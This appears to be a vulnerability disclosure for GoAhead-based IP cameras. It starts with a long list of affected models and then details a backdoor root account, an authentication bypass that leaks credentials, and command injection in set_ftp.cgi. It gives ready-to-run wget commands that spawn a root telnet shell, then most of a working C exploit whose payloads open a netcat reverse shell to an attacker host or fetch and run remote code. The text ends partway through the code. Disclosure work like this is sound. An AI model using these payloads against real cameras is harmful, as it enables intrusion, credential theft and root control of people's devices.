\nSafeHome 616-W \nSafeHome IP601W-hd \nSafeHome Other \nSafeHome VGA \nSafeHome iprobot \nSamsung Other \nSantec-Video Other \nSarotech IPCAM-1000 \nSarotech ip300 \nScricam 004 \nScricam 192.168.1.7 \nScricam AP-004 \nScricam AP-009 \nScricam AP0006 \nScricam AP006 \nSecam+CCTV IPCAM \nSecam+CCTV Other \nSeculink 10709 \nSeculink Other \nSecur+Eye xxc5330 \nSeisa JK-H616WS \nSenao PTZ-01H \nSequrecam Other \nSequrecam PNP-125 \nSercomm Other \nShenwhen+Neo+Electronic+Co NC-541 \nShenwhen+Neo+Electronic+Co Other \nShenwhen+Neo+Electronic+Co X-5000B \nShenzhen 720P \nShixin+China IP-129HW \nSiepem IPC \nSiepem S5001Y-BW \nSiepem S6203y \nSiepem S6211Y-WR \nSimi+IP+Camera+Viewer Other \nSineoji Other \nSineoji PT-315V \nSineoji PT-3215P \nSineoji PT-325IP \nSinocam Other \nSky+Genious Genious \nSkytronic IP \nSkytronic IP99 \nSkytronic Other \nSkytronic WiFi \nSkytronic dome \nSmartEye Other \nSmartWares C723IP \nSmartWares c724ip \nSmartWares c923ip \nSmartWares c924ip \nSolwise SEC-1002W-IR \nSpy+Cameras WF-100PCX \nSpy+Cameras WF-110V \nSricam 0001 \nSricam 004 \nSricam A0009 \nSricam A001 \nSricam AP-001 \nSricam AP-003 \nSricam AP-004 \nSricam AP-005 \nSricam AP-006 \nSricam AP-009 \nSricam AP-012 \nSricam AP-CAM \nSricam AP0009 \nSricam AP002 \nSricam AP995 \nSricam Cam1 \nSricam Front \nSricam Home \nSricam Other \nSricam SP005 \nSricam SP012 \nSricam SP013 \nSricam SP015 \nSricam SRICAM \nSricam SRICAM1 \nSricam aj-c2wa-c118 \nSricam ap \nSricam ap006 \nSricam ap1 \nSricam h.264 \nSricam sp013 \nSricctv A-0006 \nSricctv A-009 \nSricctv AJ-006 \nSricctv AP-0001 \nSricctv AP-0005 \nSricctv AP-0009 \nSricctv AP-001 \nSricctv AP-002 \nSricctv AP-003 \nSricctv AP-004 \nSricctv AP-004AF \nSricctv AP-005 \nSricctv AP-006 \nSricctv AP-007 \nSricctv AP-008 \nSricctv AP-009 \nSricctv AP-011 \nSricctv AP-014 \nSricctv H-264 \nSricctv Other \nSricctv P2P-BLACK \nSricctv P2P-Black \nSricctv SP-007 \nSricctv SR-001 \nSricctv SR-004 \nStar+Vedia 6836 \nStar+Vedia 7837-WIP \nStar+Vedia C-7835WIP \nStar+Vedia Other \nStar+Vedia T-6836WTP \nStar+Vedia T-7833WIP \nStar+Vedia T-7837WIP \nStar+Vedia T-7838WIP \nStarCam C33-X4 \nStarCam EY4 \nStarCam F6836W \nStarCam Other \nStarCam c7837wip \nStipelectronics Other \nStorage+Options HOMEGUARD \nStorage+Options Other \nStorage+Options SON-IPC1 \nSumpple 610 \nSumpple 610S \nSumpple 631 \nSumpple 960P \nSumpple S601 \nSumpple S610 \nSumpple S631 \nSumpple S651 \nSumpple qd300 \nSumpple s631 \nSunVision+US Other \nSunbio Other \nSuneyes Other \nSuneyes SP-T01EWP \nSuneyes SP-T01WP \nSuneyes SP-TM01EWP \nSuneyes SP-TM01WP \nSuneyes SP-tm05wp \nSunluxy H-264 \nSunluxy HZCam \nSunluxy Other \nSunluxy PTZ \nSunluxy SL-701 \nSupra+Space IPC \nSupra+Space IPC-1 \nSupra+Space IPC-100AC \nSupra+Space IPC-10AC \nSupra+Space Other11 \nSupra+Space ipc-20c \nSure-Eye Other \nSurecom LN-400 \nSwann 005FTCD \nSwann 440 \nSwann 440-IPC \nSwann ADS-440 \nSwann ADS-440-PTZ \nSwann ADS-CAMAX1 \nSwann Other \nSwann SWADS-440-IPC \nSwann SWADS-440IPC-AU \nSygonix 43176A \nSygonix 43558A \nSzneo CAM0X \nSzneo CoolCam \nSzneo NIP \nSzneo NIP-0 \nSzneo NIP-02 \nSzneo NIP-031 \nSzneo NIP-031H \nSzneo NIP-06 \nSzneo NIP-12 \nSzneo NIP-2 \nSzneo NIP-20 \nSzneo NIP-210485-ABABC \nSzneo NIP-26 \nSzneo NIP-X \nSzneo NP-254095 \nSzneo Other \nSzneo TFD \nTAS-Tech Other \nTechnaxx tx-23 \nTechview GM8126 \nTechview QC-3638 \nTechview qc3839 \nTemvis Other \nTenda C50S \nTenda c30 \nTenda c5+ \nTenvis 0012 \nTenvis 3815 \nTenvis 3815-W \nTenvis 3815W \nTenvis 3815W. \nTenvis 3815W2013 \nTenvis IP-319W \nTenvis IP-319w \nTenvis IP-391W \nTenvis IP-391WHD \nTenvis IP-602W \nTenvis IP602W \nTenvis IPROBOT \nTenvis JP-3815W \nTenvis JPT-3814WP2P \nTenvis JPT-3815 \nTenvis JPT-3815-P2P \nTenvis JPT-3815W \nTenvis JPT-3815W+ \nTenvis JPT-3815WP2P \nTenvis JPT-3815w \nTenvis JPT-3818 \nTenvis MINI-319W \nTenvis Mini-319 \nTenvis Other \nTenvis PT-7131W \nTenvis TH-661 \nTenvis TR-3818 \nTenvis TR-3828 \nTenvis TR3815W \nTenvis TZ100 \nTenvis TZ100/IPROBOT3 \nTenvus JPG3815W \nThreeboy IP-660 \nTopcam SL-30IPC01Z \nTopcam SL-720IPC02Z \nTopcam SL-910IW30 \nTopica+CCTV Other \nTrivision NC-335PW-HD-10 \nTrust NW-7500 \nTurbo+X Endurance \nTurbo+X IIPC-20 \nUokoo 720P \nVCatch Other \nVCatch VC-MIC720HK \nValtronics IP \nValtronics Other \nVandesc IP900 \nVantech Other \nVantech PTZ \nVideosec+Security IPC-103 \nVideosec+Security IPP-105 \nVimicro Other \nVitek+CCTV Other \nVstarcam 7823 \nVstarcam C-7824WIP \nVstarcam C-7833WIP-X4 \nVstarcam C-7833wip \nVstarcam C-7837WIP \nVstarcam C-7838WIP \nVstarcam C50S \nVstarcam C7816W \nVstarcam C7824WIP \nVstarcam C782WIP \nVstarcam C7842WIP \nVstarcam C93 \nVstarcam C=7824WIP \nVstarcam Cam360 \nVstarcam F-6836W \nVstarcam H-6837WI \nVstarcam H-6837WIP \nVstarcam H-6850 \nVstarcam H-6850WIP \nVstarcam H-6850wip \nVstarcam ICAM-608 \nVstarcam Other \nVstarcam T-6835WIP \nVstarcam T-6836WTP \nVstarcam T-6892wp \nVstarcam T-7815WIP \nVstarcam T-7833WIP \nVstarcam T-7833wip \nVstarcam T-7837WIP \nVstarcam T-7838WIP \nVstarcam T-7892WIP \nVstarcam T6836WTP \nVstarcam T7837WIP \nVstarcam c7815wip \nVstarcam c7833wip \nVstarcam c7850wip \nWanscam 00D6FB01980F \nWanscam 106B \nWanscam 118 \nWanscam 541-W \nWanscam 543-W \nWanscam 790 \nWanscam AJ-C0WA-198 \nWanscam AJ-C0WA-B106 \nWanscam AJ-C0WA-B116 \nWanscam AJ-C0WA-B168 \nWanscam AJ-C0WA-B1D8 \nWanscam AJ-C0WA-C0D8 \nWanscam AJ-C0WA-C116 \nWanscam AJ-C0WA-C126 \nWanscam AJ-C2WA-B118 \nWanscam AJ-C2WA-C116 \nWanscam AJ-C2WA-C118 \nWanscam AJ-C2WA-C198 \nWanscam AJ-COWA-B1D8 \nWanscam AJ-COWA-C116 \nWanscam AJ-COWA-C126 \nWanscam AJ-COWA-C128 \nWanscam AW00004J \nWanscam B1D8-1 \nWanscam C-118 \nWanscam C-126 \nWanscam Colour \nWanscam FI-18904w \nWanscam FR-4020A2 \nWanscam FR4020A2 \nWanscam HD-100W \nWanscam HW-0021 \nWanscam HW-0022 \nWanscam HW-0022HD \nWanscam HW-0023 \nWanscam HW-0024 \nWanscam HW-0025 \nWanscam HW-0026 \nWanscam HW-0028 \nWanscam HW-0033 \nWanscam HW-0036 \nWanscam HW-0038 \nWanscam HW-0039 \nWanscam HW-22 \nWanscam HW0030 \nWanscam IP \nWanscam JW-0001 \nWanscam JW-0003 \nWanscam JW-0004 \nWanscam JW-0004m \nWanscam JW-0005 \nWanscam JW-0006 \nWanscam JW-0008 \nWanscam JW-0009 \nWanscam JW-0010 \nWanscam JW-0011 \nWanscam JW-0011l \nWanscam JW-0012 \nWanscam JW-0018 \nWanscam JW-004 \nWanscam JW-009 \nWanscam JW-CD \nWanscam JW000008 \nWanscam JW0009 \nWanscam JW001 \nWanscam JW0012 \nWanscam JW008 \nWanscam JWEV \nWanscam JWEV-011777-NSRVV \nWanscam JWEV-011921-RXSXT \nWanscam JWEV-360171-BBEAC \nWanscam JWEV-380096-CECDB \nWanscam JWEV-PEPLOW \nWanscam NBC-543W \nWanscam NC-530 \nWanscam NC-541 \nWanscam NC-541/W \nWanscam NC-541W \nWanscam NC-541w \nWanscam NC-543W \nWanscam NCB-534W \nWanscam NCB-540W \nWanscam NCB-541W \nWanscam NCB-541WB \nWanscam NCB-543W \nWanscam NCBL-618W \nWanscam NCH-532MW \nWanscam NCL-610W \nWanscam NCL-612W \nWanscam NCL-616W \nWanscam NCL-S616W \nWanscam Other \nWanscam TG-002 \nWanscam WJ-0004 \nWanscam WX-617 \nWanscam Works \nWanscam XHA-120903181 \nWanscam XHA-4020a2 \nWanscam __PTZ \nWanscam chiOthernese \nWanscam ip \nWanscam jw0005 \nWanscam jw0010 \nWansview 541 \nWansview 625W \nWansview MCM-627 \nWansview N540w \nWansview NCB-534W \nWansview NCB-541W \nWansview NCB-541w \nWansview NCB-543W \nWansview NCB541W \nWansview NCB545W \nWansview NCL-610W \nWansview NCL610D04 \nWansview NCL614W \nWansview Other \nWansview dcs543w \nWansview nc543w \nWardmay+CCTV WDM-6702AL \nWatch+bot+Camera resup \nWebcamXP Other \nWinBook Other \nWinBook T-6835 \nWinBook T-6835WIP \nWinBook T-7838 \nWinic NVT-530004 \nWise+Group Other \nX-Price Other \nX10 39A \nX10 AIRSIGHT \nX10 AirSight \nX10 Airsight \nX10 Jake \nX10 Other \nX10 XC-38A \nX10 XX-36A \nX10 XX-39A \nX10 XX-56A \nX10 XX-59A \nX10 XX-60 \nX10 XX-69A \nX10 XX41Ahome \nXVision Other \nXXCamera 53100 \nXXCamera 5330-E \nXXCamera Other \nXXCamera XXC-000723-NJFJD \nXXCamera XXC-092411-DCAFC \nXXCamera XXC-50100-H \nXXCamera XXC-50100-T \nXXCamera XXC-5030-E \nXXCamera XXC-53100-T \nXXCamera XXC52130 \nXin+Ling Other \nYawcam Other \nZilink Other \nZmodo CMI-11123BK \nZmodo IP-900 \nZmodo Other \nZodiac+Security 909 \nZodiac+Security Other \nZoneway NC638MW-P \nZyXEL Other \nalexim Other \nalexim cam22822 \nalias Other \nall+in+one+ Other \nall+in+one+ b1 \nall-in-one Other \nallecto DVC-150IP \napc Other \nasw-006 Other \nboh l \nbravo Other \nbush+plus BU-300WF \nccam p2p \nchina 8904W \nchina HDIPCAM \nchina IPCAM \nchina Other \nchina PTZCAM \nchina np-02 \nciana+exports antani \ncina Other \ncoolead L \ncoolead L610WS \ndax Other \ndenver IPC-320 \ndenver IPO-320 \ne-landing 720p \neScam QF100 \nebw Other \nepexis PIPCAMHD82 \nepexis pipcam5 \nesecure nvp \ngeeya C602 \ngeeya P2P \ngeeya c801 \nhdcam Other \nhomeguard 720P \nhomeguard Other \nhomeguard Wireless \nhomeguard wifi \niView ID002A \niView Other \ninsteon 75790 \ninsteon 75790wh \ninsteon High \ninsteon Other \ninsteon Wireless \niuk 5A1 \nivision hdwificam \niwitness bullet \njwt Other \njyacam JYA8010 \nkadymay KDM-6800 \nkadymay KDM6702 \nkadymay KMD-6800 \nkadymay Other \nkang+xun xxc5030-t \nkines Other \nkiocong 1601 \nkiocong 1602 \nkiocong 1609 \nkiocong Other \nkodak 201pl \nkoicong 1601 \nl+series CAM0758 \nl+series CAM0760 \nl+series Other \nl+series V100 \nlogan n8504hh \nmeyetech 095475-caeca \nmeyetech 188091-EFBAE \nmeyetech Other \nmeyetech WirelessCam \nmicasaverde VistaCamSD \npipcam HD17 \npni 941w \npni IP451W \npni IP541W \npni IP941W \npni IP951W \npni Other \npnp IP \npnp Other \nsemac Other \nskylink WC-300PS \nstorex D-10H \n \nShodan lists 185 000 vulnerable cameras ( \nhttps://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41 \n). \n \n \n \n## Details - Backdoor account \n \nBy default, telnetd is running on the camera. \n \nuser@kali$ telnet 192.168.1.107 \nTrying 192.168.1.107... \nConnected to 192.168.1.107. \nEscape character is '^]'. \n \napk-link login: admin \nPassword: \n \ntelnet> q \nConnection closed. \nuser@kali$ \n \n \nOne backdoor account exists in the camera: \n \nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh \n \n \n \n## Details - RSA key and certificates \n \nThe `/system/www/pem/ck.pem` contains an Apple certificate with a \nprivate RSA key: \n \n \n/ # cat /system/www/pem/ck.pem \nBag Attributes \nfriendlyName: Apple Production IOS Push Services: com.app.camera \nlocalKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: \ncom.app.camera/OU=SQ6NNPBE2K/C=US \nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer \nRelations/CN=Apple Worldwide Developer Relations Certification \nAuthority \n-----BEGIN CERTIFICATE----- \n[...] \n-----END CERTIFICATE----- \nBag Attributes \nfriendlyName: andrew \nlocalKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \nKey Attributes: <No Attributes> \n-----BEGIN RSA PRIVATE KEY----- \n[...] \n-----END RSA PRIVATE KEY----- \n \n \n \n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server \n \nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication: \n \n- - htdigest authentication OR \n- - authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`). \n \n \nBy default, the web directory contains symbolic links to configuration \nfiles (`system.ini` and `system-b.ini` contain credentials): \n \n/tmp/web # ls -la *ini \nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 \nfactory.ini -> /system/param/factory.ini \nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 \nfactoryparam.ini -> /system/param/factoryparam.ini \nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 \nnetwork-b.ini -> /system/www/network.ini \nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 \nnetwork.ini -> /system/www/network.ini \nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 \nsystem-b.ini -> /system/www/system.ini \nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 \nsystem.ini -> /system/www/system.ini \n/tmp/web # \n \nWith valid credentials, an attacker can retrieve the configuration, as \nshown below: \n \nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd \n \n[...] \n000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X \n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis \n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov........... \n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n[...] \n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................ \n[...] \nuser@kali$ \n \n \nTo browse `.cgi` files, an attacker needs to authenticate too: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS' \nvar result=\"Auth Failed\"; \nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas' \nvar result=\"Auth Failed\"; \n \nBut it appears access to `.ini` files are not correctly checked. The \nattacker can bypass the authentication \nby providing an empty `loginuse` and an empty `loginpas` in the URI: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less \n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM......... \n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................ \n[...] \n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n[...] \n \n \nA PoC is provided: \n \n./expl 192.168.1.107 --get-config | xxd | grep 000003 \n \n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass \n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................ \n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................ \n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin. \n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin. \n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................ \n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................ \n \nThis vulnerability allows an attacker to steal credentials, ftp \naccounts and smtp accounts (email). \n \n \n \n## Details - Authenticated RCE as root \n \nA RCE exists in the ftp configuration CGI. This is well-documented as \nshown https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html \nand https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/ \nin several different camera models. \n \nThe partition `/` is mounted in Read-Only, so modifications are not \npossible in this partition. \n \nThe command injection is located in in `set_ftp.cgi` (see `$(ftp x.com)`): \n \nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp \nx.com)ftp&dir=/&mode=PORT&upload_interval=0 \nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin \n \nWhen doing a tcpdump, we can see the DNS resolution for x.com: \n \n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23) \n \nso, `ftp x.com` is executed. \n \nWe can use the telnetd binary to start an authenticated-less telnetd access: \n \nuser@kali$ wget -qO- \n'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd \n-p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0' \nuser@kali$ wget -qO- \n'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin' \n \n \nTesting this will give us root account on port 25/tcp: \n \nuser@kali$ telnet 192.168.1.107 25 \nTrying 192.168.1.107... \nConnected to 192.168.1.107. \nEscape character is '^]'. \n \n/ # id \nuid=0(root) gid=0 \n/ # uname -ap \nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 \nmips GNU/Linux \n/ # mount \nrootfs on / type rootfs (rw) \n/dev/root on / type squashfs (ro,relatime) \n/proc on /proc type proc (rw,relatime) \nsysfs on /sys type sysfs (rw,relatime) \ntmpfs on /dev type tmpfs (rw,relatime,size=2048k) \ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k) \ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000) \n/dev/mtdblock3 on /system type jffs2 (rw,relatime) \n/ # \n \n`/etc` is in read-only. So, command injection must not write into \n`/etc`. The injection is located in `/tmp/ftpupload.sh`: \n \n/ # cat /tmp/ftpupload.sh \n/bin/ftp -n<<! \nopen 192.168.1.1 21 \nuser ftp $(telnetd -l /bin/sh -p 25)ftp \nbinary \nlcd /tmp \nput ftptest.txt \nclose \nbye \n! \n/ # \n \n \n \n## Details - Pre-Auth RCE as root \n \nBy combining the Pre-Auth Info Leak within the GoAhead http server \nvulnerability and then authenticated RCE as root, an attacker can \nachieve a pre-auth RCE as root on a LAN or on the Internet. \n \nAn exploit is provided and can be used to get a root RCE with connect-back. \n \nThe exploit will: \n \n1. extract the valid credentials by connecting to the remote GoAhead \nHTTP server of the targeted camera \n2. plant a connect-back with `nc` \n3. execute the payload \n4. the attacker will receive a root shell with netcat on a second terminal \n5. clean the payload located in the configuration file \n \n \nIt affects 1250+ camera models. \n \n \nDemo: \n \nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl \n192.168.1.107 \nCamera 0day root RCE with connect-back @PierreKimSec \n \nPlease run `nc -vlp 1337` on 192.168.1.1 \n \n[+] bypassing auth ... done \nlogin = admin \npass = admin \n[+] planting payload ... done \n[+] executing payload ... done \n[+] cleaning payload ... done \n[+] cleaning payload ... done \n[+] enjoy your root shell on 192.168.1.1:1337 \nuser@kali$ \n \n \nOn the second xterm: \n \nuser@kali$ nc -lvp 1337 \nlistening on [any] 1337 ... \n192.168.1.107: inverse host lookup failed: Unknown host \nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968 \nid \nuid=0(root) gid=0 \nuname -ap \nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 \nmips GNU/Linux \nps \nPID USER TIME COMMAND \n1 root 0:01 {linuxrc} init \n2 root 0:00 [kthreadd] \n3 root 0:00 [ksoftirqd/0] \n5 root 0:00 [kworker/0:0H] \n6 root 0:00 [kworker/u2:0] \n7 root 0:00 [rcu_preempt] \n8 root 0:00 [rcu_bh] \n9 root 0:00 [rcu_sched] \n10 root 0:00 [watchdog/0] \n11 root 0:00 [khelper] \n12 root 0:00 [writeback] \n13 root 0:00 [bioset] \n14 root 0:00 [kblockd] \n15 root 0:00 [khubd] \n16 root 0:00 [kworker/0:1] \n17 root 0:00 [cfg80211] \n18 root 0:00 [rpciod] \n19 root 0:00 [kswapd0] \n20 root 0:00 [fsnotify_mark] \n21 root 0:00 [nfsiod] \n22 root 0:00 [crypto] \n36 root 0:00 [kworker/u2:1] \n39 root 0:00 [i2s_work_1] \n40 root 0:00 [i2s_codec_irq_w] \n41 root 0:00 [kworker/0:2] \n42 root 0:00 [deferwq] \n43 root 0:00 [kworker/0:1H] \n59 root 0:00 [jffs2_gcd_mtd3] \n61 root 0:00 telnetd \n69 root 0:00 /system/system/bin/wifidaemon \n70 root 0:00 /sbin/getty -L ttyS1 115200 vt100 \n98 root 0:01 [RtmpTimerTask] \n99 root 0:00 [RtmpMlmeTask] \n100 root 0:00 [RtmpCmdQTask] \n101 root 0:00 [RtmpWscTask] \n148 root 1:19 /tmp/encoder \n164 root 0:00 [irq/37-isp] \n236 root 0:07 [apical_isp_fw_p] \n2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt \n2331 root 0:00 {exe} ash /tmp/ftpupload.sh \n2332 root 0:00 {exe} ash /tmp/ftpupload.sh \n2333 root 0:00 /bin/ftp -n \n2334 root 0:00 /bin/sh \n2439 root 0:00 ps \n \n \nA working exploit is provided: \n \n \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <arpa/inet.h> \n#include <netinet/in.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n \n \n#define CAM_PORT 80 \n#define REMOTE_HOST \"192.168.1.1\" \n#define REMOTE_PORT \"1337\" \n#define PAYLOAD_0 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" \nREMOTE_HOST \"+\" REMOTE_PORT \n\"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n#define PAYLOAD_1 \"GET \n/ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\" \n#define PAYLOAD_2 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n \n \n#define ALTERNATIVE_PAYLOAD_zero0 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" \nREMOTE_HOST \"+\" REMOTE_PORT \n\"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n#define ALTERNATIVE_PAYLOAD_zero1 \"GET \n/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" \nREMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\" \n \nchar * creds(char *argv, \nint get_config); \n \nint rce(char *argv, \nchar *id, \nchar attack[], \nchar desc[]); \n \n \nint main(int argc, \nchar **argv, \nchar **envp) \n{ \nchar *id; \n \nprintf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\"); \n \nif (argc < 2) \n{ \nprintf(\"%s target\\n\", argv[0]); \nprintf(\"%s target --get-config will dump the configuration \nand exit\\n\", argv[0]); \nreturn (1); \n} \n \nif (argc == 2) \nprintf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST); \n \nif (argc == 3 && !strcmp(argv[2], \"--get-config\")) \nid = creds(argv[1], 1); \nelse \nid = creds(argv[1], 0); \n \nif (id == NULL) \n{ \nprintf(\"exploit failed\\n\"); \nreturn (1); \n} \nprintf(\"done\\n\"); \n \nprintf(\" login = %s\\n\", id); \nprintf(\" pass = %s\\n\", id + 32); \n \nif (!rce(argv[1], id, PAYLOAD_0, \"planting\")) \nprintf(\"done\\n\"); \nsleep(1); \nif (!rce(argv[1], id, PAYLOAD_1, \"executing\")) \nprintf(\"done\\n\"); \nif (!rce(argv[1], id, PAYLOAD_2, \"cleaning\")) \nprintf(\"done\\n\"); \nif (!rce(argv[1], id, PAYLOAD_1, \"cleaning\")) \nprintf(\"done\\n\"); \n \nprintf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT); \n \nreturn (0); \n} \n \n \nchar * creds(char *argv, \nint get_config) \n{ \nint sock; \nint n; \nstruct sockaddr_in serv_addr; \nchar buf[8192] = { 0 }; \nchar *out; \nchar *tmp; \nchar payload[] = \"GET /system.ini?loginuse&loginpas \nHTTP/1.0\\r\\n\\r\\n\"; \nint old_n; \nint n_total; \n \n \nsock = 0; \nn = 0; \nold_n = 0; \nn_total = 0; \n \nprintf(\"[+] bypassing auth ... \"); \n \nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) \n{ \nprintf(\"Error while creating socket\\n\"); \nreturn (NULL); \n} \n \nmemset(&serv_addr, '0', sizeof(serv_addr)); \nserv_addr.sin_family = AF_INET; \nserv_addr.sin_port = htons(CAM_PORT); \n \nif (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0) \n{ \nprintf(\"Error while inet_pton\\n\"); \nreturn (NULL); \n} \n \nif (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0) \n{ \nprintf(\"creds: connect failed\\n\"); \nreturn (NULL); \n} \n \nif (send(sock, payload, strlen(payload) , 0) < 0) \n{ \nprintf(\"creds: send failed\\n\"); \nreturn (NULL); \n} \n \nif (!(tmp = malloc(10 * 1024 * sizeof(char)))) \nreturn (NULL); \n \nif (!(out = calloc(64, sizeof(char)))) \nreturn (NULL); \n \nwhile ((n = recv(sock, buf, sizeof(buf), 0)) > 0) \n{ \nn_total += n; \nif (n_total < 1024 * 10) \nmemcpy(tmp + old_n, buf, n); \nif (n >= 0) \nold_n = n; \n} \n \nclose(sock); \n \n/* \n[ HTTP HEADERS ] \n... \n \n000????: 0000 0a0a 0a0a 01.. .... .... .... .... \n^^^^ ^^^^ ^^ \nUseful 